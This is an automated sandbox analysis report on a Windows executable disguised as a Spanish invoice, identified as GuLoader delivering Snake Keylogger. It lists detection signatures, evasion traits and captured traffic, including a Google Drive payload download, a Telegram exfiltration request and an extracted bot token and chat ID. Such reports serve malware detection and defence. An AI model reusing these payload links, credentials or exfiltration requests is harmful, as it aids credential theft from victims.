Windows Analysis Report
Factura Honorarios 2024-10.exe

Overview

General Information

Sample name: Factura Honorarios 2024-10.exe
Analysis ID: 1545394
MD5: 43a7d0b4c9aefb5dd8c1fbfad057b4b9
SHA1: abcfcabf7f909fc140e8e00bfaeea404e23fca76
SHA256: edf915e141af931f3bf0174a430576b7f7493449bdb1a4275515d0fe0a24fd8c
Tags: exevipkeyloggeruser-malwarelabnet
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000004.00000002.3011994404.00000000379A1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7807279596:AAEZM1QwkCh738-y0Qmnc3ubaoLMl6bUCVw", "Chat_id": "7267131103", "Version": "4.4"}
Multi AV Scanner detection for submitted file
Source: Factura Honorarios 2024-10.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ACC87A8 CryptUnprotectData, 4_2_3ACC87A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ACC8EF1 CryptUnprotectData, 4_2_3ACC8EF1
Uses 32bit PE files
Source: Factura Honorarios 2024-10.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49846 version: TLS 1.0
Source: unknown HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49943 version: TLS 1.2
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F2C0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F4AC
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 0016FC19h 4_2_0016F960
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C531E0h 4_2_39C52DC8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C52C19h 4_2_39C52968
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5E501h 4_2_39C5E258
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5DC51h 4_2_39C5D9A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C531E0h 4_2_39C52DB8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5D7F9h 4_2_39C5D550
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C531E0h 4_2_39C5310E
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5D3A1h 4_2_39C5D0F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5CF49h 4_2_39C5CCA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_39C50040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5FAB9h 4_2_39C5F810
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5F661h 4_2_39C5F3B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5F209h 4_2_39C5EF60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5EDB1h 4_2_39C5EB08
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C50D0Dh 4_2_39C50B30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C51697h 4_2_39C50B30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5E959h 4_2_39C5E6B0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 39C5E0A9h 4_2_39C5DE00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC6CC1h 4_2_3ACC6A18
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC9280h 4_2_3ACC8FB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC7EB5h 4_2_3ACC7B78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC79C9h 4_2_3ACC7720
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC7571h 4_2_3ACC72C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCC396h 4_2_3ACCC0C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC5179h 4_2_3ACC4ED0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCF5C6h 4_2_3ACCF2F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC0B99h 4_2_3ACC08F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then mov esp, ebp 4_2_3ACCB08C
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC6733h 4_2_3ACC6488
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC0741h 4_2_3ACC0498
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC2151h 4_2_3ACC1EA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCE386h 4_2_3ACCE0B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC02E9h 4_2_3ACC0040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC1CF9h 4_2_3ACC1A50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCF136h 4_2_3ACCEE68
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC3709h 4_2_3ACC3460
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC4D21h 4_2_3ACC4A78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCD146h 4_2_3ACCCE78
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC7119h 4_2_3ACC6E70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC32B1h 4_2_3ACC3008
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCDEF6h 4_2_3ACCDC28
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC48C9h 4_2_3ACC4620
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCBF06h 4_2_3ACCBC38
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC62D9h 4_2_3ACC6030
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCECA6h 4_2_3ACCE9D8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC5E81h 4_2_3ACC5BD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCCCB6h 4_2_3ACCC9E8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC18A1h 4_2_3ACC15F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCFA56h 4_2_3ACCF788
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC5A29h 4_2_3ACC5780
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCDA66h 4_2_3ACCD798
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCBA76h 4_2_3ACCB7A8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC1449h 4_2_3ACC11A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC2E59h 4_2_3ACC2BB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC0FF1h 4_2_3ACC0D48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCE816h 4_2_3ACCE548
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC2A01h 4_2_3ACC2758
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCC826h 4_2_3ACCC558
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCD5D6h 4_2_3ACCD308
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC25A9h 4_2_3ACC2300
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACCB5E6h 4_2_3ACCB318
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3ACC55D1h 4_2_3ACC5328
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD36970h 4_2_3AD36678
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3AC60h 4_2_3AD3A968
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3079Eh 4_2_3AD304D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD377C8h 4_2_3AD374D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD36347h 4_2_3AD35FD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3A2D0h 4_2_3AD39FD8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3BAB8h 4_2_3AD3B7C0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3E5C0h 4_2_3AD3E2C8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD310BEh 4_2_3AD30DF0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD38AE8h 4_2_3AD387F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD322C6h 4_2_3AD31FF8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3B5F0h 4_2_3AD3B2F8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3CDD8h 4_2_3AD3CAE0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD342B6h 4_2_3AD33FE8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3F8E0h 4_2_3AD3F5E8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3EA88h 4_2_3AD3E790
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD35066h 4_2_3AD34D98
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD37C90h 4_2_3AD37998
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3154Eh 4_2_3AD31280
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD39478h 4_2_3AD39180
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD32756h 4_2_3AD32488
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3BF80h 4_2_3AD3BC88
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3FDA8h 4_2_3AD3FAB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD35986h 4_2_3AD356B8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD38FB0h 4_2_3AD38CB8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD31E47h 4_2_3AD31BA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3A798h 4_2_3AD3A4A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD33076h 4_2_3AD32DA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3D2A0h 4_2_3AD3CFA8
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3C448h 4_2_3AD3C150
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD33E26h 4_2_3AD33B58
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3EF50h 4_2_3AD3EC58
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3030Eh 4_2_3AD30040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD36E38h 4_2_3AD36B40
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD35E16h 4_2_3AD35B48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD39940h 4_2_3AD39648
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3D768h 4_2_3AD3D470
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD34746h 4_2_3AD34478
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD30C2Eh 4_2_3AD30960
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD38158h 4_2_3AD37E60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD319DEh 4_2_3AD31710
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD39E08h 4_2_3AD39B10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD32BE6h 4_2_3AD32918
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3C910h 4_2_3AD3C618
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3E0F8h 4_2_3AD3DE00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD34BD7h 4_2_3AD34908
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD37300h 4_2_3AD37008
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3B128h 4_2_3AD3AE30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD33506h 4_2_3AD33238
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3DC30h 4_2_3AD3D938
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD3F418h 4_2_3AD3F120
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD354F6h 4_2_3AD35228
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD38620h 4_2_3AD38328
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD71FE8h 4_2_3AD71CF0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD71190h 4_2_3AD70E98
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD70338h 4_2_3AD70040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD71B20h 4_2_3AD71828
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD70CC8h 4_2_3AD709D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD71658h 4_2_3AD71360
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then jmp 3AD70801h 4_2_3AD70508
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3ADB3E70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3ADB3E60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3ADB0A10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3ADB09E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_3ADB0D26

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2031/10/2024%20/%2001:29:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49859 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49835 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49877 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49852 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49802 -> 216.58.206.46:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1oJw8WIUYqUxWmFwtYXemvm2bVtwDyPlb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1oJw8WIUYqUxWmFwtYXemvm2bVtwDyPlb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49846 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1oJw8WIUYqUxWmFwtYXemvm2bVtwDyPlb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1oJw8WIUYqUxWmFwtYXemvm2bVtwDyPlb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
